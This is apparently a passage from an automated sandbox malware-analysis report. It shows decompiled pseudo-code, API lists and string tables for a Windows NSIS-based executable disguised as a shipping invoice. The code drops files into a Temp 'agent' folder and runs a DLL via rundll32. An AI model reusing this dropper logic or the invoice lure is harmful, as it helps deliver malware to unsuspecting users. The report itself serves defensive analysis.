						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t102 =  *0x429440; // 0xe4ed
						 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x42f438 = _t102;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x429450; // 0xf65d
						if(__eflags < 0) {
							_v8 = E004065B5(_v8, 0x421440, _t106);
						}
						 *0x429440 =  *0x429440 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 != 0);
					goto L22;
				}
			}
































                                                                                                                                    0x00402e22
                                                                                                                                    0x00402e25
                                                                                                                                    0x00402e3f
                                                                                                                                    0x00402e44
                                                                                                                                    0x00402e57
                                                                                                                                    0x00402e5c
                                                                                                                                    0x00402e62
                                                                                                                                    0x00000000
                                                                                                                                    0x00402e64
                                                                                                                                    0x00402e75
                                                                                                                                    0x00402e86
                                                                                                                                    0x00402e8d
                                                                                                                                    0x00402e93
                                                                                                                                    0x00402e95
                                                                                                                                    0x00402e9a
                                                                                                                                    0x00402e9c
                                                                                                                                    0x00402f8a
                                                                                                                                    0x00402f8c
                                                                                                                                    0x00402f91
                                                                                                                                    0x00402f98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f9e
                                                                                                                                    0x00402fa1
                                                                                                                                    0x00402fcd
                                                                                                                                    0x00402fd2
                                                                                                                                    0x00402fd8
                                                                                                                                    0x00402fe1
                                                                                                                                    0x00402fe2
                                                                                                                                    0x00402fe7
                                                                                                                                    0x00402ff8
                                                                                                                                    0x00402ffe
                                                                                                                                    0x00403004
                                                                                                                                    0x0040300a
                                                                                                                                    0x00403014
                                                                                                                                    0x0040302f
                                                                                                                                    0x00403035
                                                                                                                                    0x00403038
                                                                                                                                    0x0040303d
                                                                                                                                    0x0040305c
                                                                                                                                    0x0040306c
                                                                                                                                    0x0040307e
                                                                                                                                    0x00403083
                                                                                                                                    0x00403088
                                                                                                                                    0x0040308b
                                                                                                                                    0x00403094
                                                                                                                                    0x00403098
                                                                                                                                    0x004030a0
                                                                                                                                    0x004030a5
                                                                                                                                    0x004030a7
                                                                                                                                    0x004030a7
                                                                                                                                    0x004030a7
                                                                                                                                    0x004030ad
                                                                                                                                    0x004030ad
                                                                                                                                    0x004030b0
                                                                                                                                    0x004030b2
                                                                                                                                    0x004030b2
                                                                                                                                    0x004030b4
                                                                                                                                    0x004030b6
                                                                                                                                    0x004030b6
                                                                                                                                    0x004030b6
                                                                                                                                    0x004030b9
                                                                                                                                    0x004030c0
                                                                                                                                    0x004030cc
                                                                                                                                    0x004030d1
                                                                                                                                    0x00000000
                                                                                                                                    0x004030d1
                                                                                                                                    0x00000000
                                                                                                                                    0x0040308b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040303f
                                                                                                                                    0x00402fa9
                                                                                                                                    0x00402fb4
                                                                                                                                    0x00402fb9
                                                                                                                                    0x00402fbb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402fc4
                                                                                                                                    0x00402fc7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402ea2
                                                                                                                                    0x00402ea2
                                                                                                                                    0x00402ea7
                                                                                                                                    0x00402eab
                                                                                                                                    0x00402eb2
                                                                                                                                    0x00402eb7
                                                                                                                                    0x00402eb9
                                                                                                                                    0x00402ebb
                                                                                                                                    0x00402ebb
                                                                                                                                    0x00402ec3
                                                                                                                                    0x00402ec8
                                                                                                                                    0x00402eca
                                                                                                                                    0x0040304b
                                                                                                                                    0x0040308d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040308d
                                                                                                                                    0x00402ed0
                                                                                                                                    0x00402ed6
                                                                                                                                    0x00402f56
                                                                                                                                    0x00402f5a
                                                                                                                                    0x00402f5d
                                                                                                                                    0x00402f62
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f5a
                                                                                                                                    0x00402ee3
                                                                                                                                    0x00402ee8
                                                                                                                                    0x00402eeb
                                                                                                                                    0x00402ef0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402ef2
                                                                                                                                    0x00402ef9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402efb
                                                                                                                                    0x00402f02
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f04
                                                                                                                                    0x00402f0b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f0d
                                                                                                                                    0x00402f14
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f16
                                                                                                                                    0x00402f1c
                                                                                                                                    0x00402f25
                                                                                                                                    0x00402f2b
                                                                                                                                    0x00402f2e
                                                                                                                                    0x00402f30
                                                                                                                                    0x00402f36
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f3c
                                                                                                                                    0x00402f40
                                                                                                                                    0x00402f48
                                                                                                                                    0x00402f48
                                                                                                                                    0x00402f4b
                                                                                                                                    0x00402f4e
                                                                                                                                    0x00402f50
                                                                                                                                    0x00402f52
                                                                                                                                    0x00402f52
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f50
                                                                                                                                    0x00402f42
                                                                                                                                    0x00402f46
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f63
                                                                                                                                    0x00402f63
                                                                                                                                    0x00402f69
                                                                                                                                    0x00402f79
                                                                                                                                    0x00402f79
                                                                                                                                    0x00402f7c
                                                                                                                                    0x00402f82
                                                                                                                                    0x00402f82
                                                                                                                                    0x00402f82
                                                                                                                                    0x00000000
                                                                                                                                    0x00402ea2

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402E28
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,00000400), ref: 00402E44
                                                                                                                                      • Part of subcall function 00405CFF: GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405D03
                                                                                                                                      • Part of subcall function 00405CFF: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D25
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00402E8D
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402FD2
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00402E64
                                                                                                                                    • Null, xrefs: 00402F0D
                                                                                                                                    • Inst, xrefs: 00402EFB
                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00402E6F, 00402E74, 00402E7A
                                                                                                                                    • C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe, xrefs: 00402E2E, 00402E3D, 00402E51, 00402E6E
                                                                                                                                    • p, xrefs: 004030B9
                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040308D
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402E1E, 00402FF2
                                                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040303F
                                                                                                                                    • soft, xrefs: 00402F04
                                                                                                                                    • "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" , xrefs: 00402E14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$p$soft
                                                                                                                                    • API String ID: 2803837635-1799494454
                                                                                                                                    • Opcode ID: 9bef222d6a43c43d5f4d12975c22a7cb7fe6d4270d3fd1e90c43ad95b9de5dcd
                                                                                                                                    • Instruction ID: 28bbd0e13b5f39eb8630a6ef8b1f9e0b653b294dce63aa05062ccd540898c3a3
                                                                                                                                    • Opcode Fuzzy Hash: 9bef222d6a43c43d5f4d12975c22a7cb7fe6d4270d3fd1e90c43ad95b9de5dcd
                                                                                                                                    • Instruction Fuzzy Hash: 70710B31A00205ABDB20AF64DE85B9E7BB8EB04759F90413BF504B72D0D7BC9E458B5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406188, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E00406188(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x671d5f
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00406188(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E00406166(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004060C4(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D0(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E0040604D((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406188(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406166(_a4, _t39);
			}



























                                                                                                                                    0x00406188
                                                                                                                                    0x00406188
                                                                                                                                    0x00406188
                                                                                                                                    0x0040618e
                                                                                                                                    0x00406193
                                                                                                                                    0x00406195
                                                                                                                                    0x004061a4
                                                                                                                                    0x004061a4
                                                                                                                                    0x004061ac
                                                                                                                                    0x004061ad
                                                                                                                                    0x004061ae
                                                                                                                                    0x004061af
                                                                                                                                    0x004061b2
                                                                                                                                    0x004061ba
                                                                                                                                    0x004061bc
                                                                                                                                    0x004061d3
                                                                                                                                    0x004061d6
                                                                                                                                    0x004061d6
                                                                                                                                    0x004063ad
                                                                                                                                    0x004063ad
                                                                                                                                    0x004063b1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004061e3
                                                                                                                                    0x004061e9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004061ef
                                                                                                                                    0x004061f0
                                                                                                                                    0x004061f3
                                                                                                                                    0x004061f6
                                                                                                                                    0x004063a0
                                                                                                                                    0x004063aa
                                                                                                                                    0x004063ac
                                                                                                                                    0x004063ac
                                                                                                                                    0x004063a2
                                                                                                                                    0x004063a4
                                                                                                                                    0x004063a6
                                                                                                                                    0x004063a7
                                                                                                                                    0x004063a7
                                                                                                                                    0x00000000
                                                                                                                                    0x004063a0
                                                                                                                                    0x004061fc
                                                                                                                                    0x00406200
                                                                                                                                    0x00406210
                                                                                                                                    0x00406217
                                                                                                                                    0x0040621a
                                                                                                                                    0x00406222
                                                                                                                                    0x00406225
                                                                                                                                    0x0040622c
                                                                                                                                    0x0040622d
                                                                                                                                    0x00406230
                                                                                                                                    0x0040634d
                                                                                                                                    0x00406350
                                                                                                                                    0x00406380
                                                                                                                                    0x00406383
                                                                                                                                    0x00406388
                                                                                                                                    0x0040638c
                                                                                                                                    0x0040638c
                                                                                                                                    0x00406391
                                                                                                                                    0x00406397
                                                                                                                                    0x00406399
                                                                                                                                    0x00000000
                                                                                                                                    0x00406399
                                                                                                                                    0x00406352
                                                                                                                                    0x00406355
                                                                                                                                    0x0040636a
                                                                                                                                    0x00406371
                                                                                                                                    0x00406357
                                                                                                                                    0x0040635e
                                                                                                                                    0x0040635e
                                                                                                                                    0x00406379
                                                                                                                                    0x0040637c
                                                                                                                                    0x00406345
                                                                                                                                    0x00406346
                                                                                                                                    0x00406346
                                                                                                                                    0x00000000
                                                                                                                                    0x0040637c
                                                                                                                                    0x00406236
                                                                                                                                    0x0040623d
                                                                                                                                    0x0040623f
                                                                                                                                    0x00406240
                                                                                                                                    0x0040625a
                                                                                                                                    0x0040625a
                                                                                                                                    0x00406261
                                                                                                                                    0x00406261
                                                                                                                                    0x00406268
                                                                                                                                    0x0040626c
                                                                                                                                    0x0040626c
                                                                                                                                    0x0040626d
                                                                                                                                    0x0040626f
                                                                                                                                    0x004062a8
                                                                                                                                    0x004062ab
                                                                                                                                    0x004062bb
                                                                                                                                    0x004062be
                                                                                                                                    0x004062c6
                                                                                                                                    0x004062cc
                                                                                                                                    0x004062cc
                                                                                                                                    0x0040632b
                                                                                                                                    0x0040632b
                                                                                                                                    0x0040632d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004062d0
                                                                                                                                    0x004062d7
                                                                                                                                    0x004062d8
                                                                                                                                    0x004062da
                                                                                                                                    0x004062f4
                                                                                                                                    0x00406302
                                                                                                                                    0x00406308
                                                                                                                                    0x0040630a
                                                                                                                                    0x00406328
                                                                                                                                    0x00406328
                                                                                                                                    0x00406328
                                                                                                                                    0x00000000
                                                                                                                                    0x00406328
                                                                                                                                    0x00406310
                                                                                                                                    0x00406319
                                                                                                                                    0x0040631c
                                                                                                                                    0x00406322
                                                                                                                                    0x00406326
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406326
                                                                                                                                    0x004062dc
                                                                                                                                    0x004062df
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004062ee
                                                                                                                                    0x004062f0
                                                                                                                                    0x004062f2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004062f2
                                                                                                                                    0x00000000
                                                                                                                                    0x0040632b
                                                                                                                                    0x004062b3
                                                                                                                                    0x00000000
                                                                                                                                    0x00406271
                                                                                                                                    0x0040628c
                                                                                                                                    0x00406291
                                                                                                                                    0x00406294
                                                                                                                                    0x00406334
                                                                                                                                    0x00406334
                                                                                                                                    0x00406338
                                                                                                                                    0x00406340
                                                                                                                                    0x00406340
                                                                                                                                    0x00000000
                                                                                                                                    0x00406338
                                                                                                                                    0x0040629e
                                                                                                                                    0x0040632f
                                                                                                                                    0x0040632f
                                                                                                                                    0x00406332
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406332
                                                                                                                                    0x0040626f
                                                                                                                                    0x00406242
                                                                                                                                    0x00406246
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406248
                                                                                                                                    0x0040624c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040624e
                                                                                                                                    0x00406252
                                                                                                                                    0x00000000
                                                                                                                                    0x00406254
                                                                                                                                    0x00406254
                                                                                                                                    0x00000000
                                                                                                                                    0x00406254
                                                                                                                                    0x00406252
                                                                                                                                    0x004063b7
                                                                                                                                    0x004063c1
                                                                                                                                    0x004063cd
                                                                                                                                    0x004063cd
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000400), ref: 004062B3
                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000400,?,0042A078,00000000,004052C5,0042A078,00000000), ref: 004062C6
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(004052C5,00000000,?,0042A078,00000000,004052C5,0042A078,00000000), ref: 00406302
                                                                                                                                    • SHGetPathFromIDListA.SHELL32(00000000,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent), ref: 00406310
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040631C
                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,\Microsoft\Internet Explorer\Quick Launch), ref: 00406340
                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,0042A078,00000000,004052C5,0042A078,00000000,00000000,00000000,00000000), ref: 00406392
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 717251189-1054654634
                                                                                                                                    • Opcode ID: eaa5d213a5baab0d35b31186351ceecca8addbf06f170eed641c8924b89c10a3
                                                                                                                                    • Instruction ID: be79e8900952b0bcd71d12beb6e151bfd298952ab6d62edeb4306d0cd8c50f96
                                                                                                                                    • Opcode Fuzzy Hash: eaa5d213a5baab0d35b31186351ceecca8addbf06f170eed641c8924b89c10a3
                                                                                                                                    • Instruction Fuzzy Hash: 1D611131900101AFDF206F64C984BBE7BB4AB55314F52413FE943BA2D1C67C4962DB8E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402B2C(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x34) & 0x00000007;
				_t33 = E00405B6B(_t82);
				_push(_t82);
				_t83 = "rundll32.exe Prehnite,Lychnises";
				if(_t33 == 0) {
					lstrcatA(E00405AFE(E00406166(_t83, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E00406166();
				}
				E004063D0(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406469(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x28);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405CDA(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405CFF(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040528D(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E00406166(0x40ac30, 0x430000);
						E00406166(0x430000, _t83);
						E00406188(_t75, 0x40ac30, _t83, "C:\Users\jones\AppData\Local\Temp\include\net-knjiela\agent",  *((intOrPtr*)(_t85 - 0x20)));
						E00406166(0x430000, 0x40ac30);
						_t62 = E00405882("C:\Users\jones\AppData\Local\Temp\include\net-knjiela\agent",  *(_t85 - 0x34) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040528D();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040528D(0xffffffea,  *(_t85 - 8));
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_t43 = E004030DA(_t77,  *((intOrPtr*)(_t85 - 0x2c)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x28) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x28) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x28, _t75, _t85 - 0x28); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x24)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x24)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00406188(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00406188(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405882();
					goto L29;
				}
				goto L33;
			}

















                                                                                                                                    0x00401759
                                                                                                                                    0x00401760
                                                                                                                                    0x00401769
                                                                                                                                    0x0040176c
                                                                                                                                    0x0040176f
                                                                                                                                    0x00401774
                                                                                                                                    0x00401775
                                                                                                                                    0x0040177c
                                                                                                                                    0x00401798
                                                                                                                                    0x0040177e
                                                                                                                                    0x0040177f
                                                                                                                                    0x0040177f
                                                                                                                                    0x0040179e
                                                                                                                                    0x004017a8
                                                                                                                                    0x004017a8
                                                                                                                                    0x004017ac
                                                                                                                                    0x004017af
